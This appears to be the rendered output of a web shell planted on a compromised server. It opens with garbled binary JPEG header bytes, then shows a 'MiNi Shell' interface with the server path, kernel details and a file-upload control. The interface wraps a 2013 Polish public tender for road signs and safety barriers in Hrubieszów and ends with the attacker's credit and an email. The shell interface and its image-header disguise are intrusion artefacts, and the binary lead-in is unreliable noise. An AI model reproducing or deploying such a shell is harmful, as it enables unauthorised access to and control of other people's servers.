JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130905/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130905/178897-N-2013.html

<p class="kh_header"><b>Hrubieszów: Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich 
montażem na drogach wojewódzkich administrowanych przez RDW Hrubieszów 
zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 
2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów 
drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich 
umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi 
zmianami)</b><br>
<b>Numer ogłoszenia: 178897 - 2013; data zamieszczenia: 05.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Hrubieszowie , ul. Grabowiecka 18b, 22-500 Hrubieszów, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich 
montażem na drogach wojewódzkich administrowanych przez RDW Hrubieszów 
zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 
2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów 
drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich 
umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi 
zmianami).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich 
montażem na drogach wojewódzkich administrowanych przez RDW Hrubieszów 
zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 
2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów 
drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich 
umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi zmianami) 
  
 Zadanie nr 1 Dostawa znaków wraz z  dostosowaniem istniejącego oznakowania 
pionowego do Projektu Stałej Organizacji Ruchu nr 4063/78/2012 droga wojewódzka 
nr 850 
 
Zadanie nr 2 Dostawa wraz z ustawieniem  urządzeń bezpieczeństwa ruchu 
drogowego oraz wymianą uszkodzonych elementów barier ochronnych 
 
Zadanie nr 3 Dostawa kompletów znaków drogowych i urządzeń bezpieczeństwa 
ruchu drogowego wraz z elementami mocującymi do siedziby RDW w Hrubieszowie 
Wartość zamówienia 242 628,14 zl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.31.62.13-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:  
Zad nr 1 - 1 838,00 zł, (słownie złotych: jeden tysiąc osiemset trzydzieści osiem zł 00/100).  

Zad nr 2  - 5 086,00 zł, (słownie złotych: pięć tysięcy osiemdziesiąt sześć zł 00/100). 
Zad nr 3 - 353,00  zł, (słownie złotych: trzysta pięćdziesiąt trzy zł 00/100). 
Łącznie na całość zamówienia 7 277,00 zł(słownie złotych: siedem tysięcy dwieście 
siedemdziesiąt siedem zł 00/100). 
 
2. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem  na konto ZDW Lublin   
nr 89 1500 1520 1215   2004 1596  0000)  z podaniem w tytule wpłaty, nazwy 
zamówienia. 
3. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo      
zamówień publicznych. 
  1)Przy czym wadium wnoszone w formie  gwarancji musi być załączone do oferty            
w oryginale i musi obejmować cały okres związania ofertą. 
4.   Okoliczności i zasady zwrotu wadium, jego przepadku określa Ustawa PZP. 
5.   W ofercie należy złożyć dokument potwierdzający wniesienie wadium. 
  1)Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo 
zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez 
Zamawiającego. W myśl art. 63. ust. 3 pkt.1 ustawy Prawo bankowe z dnia 29 sierpnia 
1997 (Dz. U z 2002 Nr 72 poz. 665 j. t.) polecenie przelewu jest jedną z form rozliczenia 
bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi 
udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą uznania 
tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na 
poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych 
artykułów. 
  2) Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione       
w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania       
ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na: 
dysponowania narzędziami, wyposażenia zakładu i urządzeniami technicznymi 
dostępnymi wykonawcy w celu realizacji zamówienia, warunek zostanie uznany za 
spełniony:  
dla zadania nr 1, gdy Wykonawca wykaże, że będzie dysponować jednostkami sprzętu i 
środkami  transportu wymienionymi poniżej: 
     - samochód ciężarowy o ładowności min 3,5 ton 
 
 - wiertnica mechaniczna 
dla zadania nr 2, gdy Wykonawca wykaże, że: będzie dysponować jednostkami sprzętu i 
środkami  transportu wymienionymi poniżej: 
- mobilny kafar hydrauliczny szt. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na: 
dysponowaniu osobami zdolnymi do wykonywania zamówienia  warunek zostanie 
uznany za spełniony gdy Wykonawca wykaże, że: będzie dysponować na zadania 1 i 2  
brygadą min. 10 osób zdolną do wykonania zamówienia dla każdego zadania osobno</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmianie wynagrodzenia w przypadku gdy zmianie ulegnie stawka podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich 
w Hrubieszowie, Rejon Dróg Wojewódzkich w Hrubieszowie ul. Grabowiecka 18 b bezpłatnie w pokoju nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2013 godzina 11:00, miejsce: Zarząd Dróg Wojewódzkich 
w Hrubieszowie, Rejon Dróg Wojewódzkich w Hrubieszowie ul. Grabowiecka 18 b w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy 
przekazują pisemnie - pocztą, za pomocą faksu nr 84 6972691 lub drogą 
elektroniczną na adres e-mail: rdw.hrubieszow@zdw.lublin.pl . 
     Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. 
2. Osoby uprawnione do porozumiewania się z wykonawcami: 
1) W sprawach technicznych - Andrzej Kowalski               
     tel. (84) 6962093 w godz 8-14 
2) W sprawach formalno-prawnych związanych z postępowaniem o udzielenie 
zamówienia i zawarciem umowy -  Pasieka Robert, tel. 691955219 
3.  Uwaga: 
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego 
lub w inny sposób i zamierzają się ubiegać o udzielenie zamówienia, proszeni są 
o przesłanie krótkiej informacji faksem na numer (84) 6972691 lub pocztą elektroniczną na 
adres e-mail: rdw.hrubieszow@zdw.lublin.pl, zawierającej podstawowe dane firmy (nazwa, 
adres, numer telefonu i faksu). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania 
się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) 
zawiadamiani o np. zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji 
istotnych warunków zamówienia, odwołaniach dotyczących treści ogłoszenia i SIWZ, 
zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu 
składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Dostawa znaków wraz z  dostosowaniem istniejącego oznakowania 
pionowego do Projektu Stałej Organizacji Ruchu nr 4063/78/2012 droga wojewódzka 
nr 850.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 Dostawa znaków wraz z  dostosowaniem istniejącego oznakowania 
pionowego do Projektu Stałej Organizacji Ruchu nr 4063/78/2012 droga wojewódzka 
nr 850 
 Wartość zamówienia 61286,90 zł.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.31.62.13-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Dostawa wraz z ustawieniem  urządzeń bezpieczeństwa ruchu 
drogowego oraz wymianą uszkodzonych elementów barier ochronnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 Dostawa wraz z ustawieniem  urządzeń bezpieczeństwa ruchu 
drogowego oraz wymianą uszkodzonych elementów barier ochronnych 
Wartość zamówienia 169552,64 zł.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.31.62.13-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 Dostawa kompletów znaków drogowych i urządzeń bezpieczeństwa 
ruchu drogowego wraz z elementami mocującymi do siedziby RDW w Hrubieszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 Dostawa kompletów znaków drogowych i urządzeń bezpieczeństwa 
ruchu drogowego wraz z elementami mocującymi do siedziby RDW w Hrubieszowie
Wartość zamówienia 11788,59 zł.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.31.62.13-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com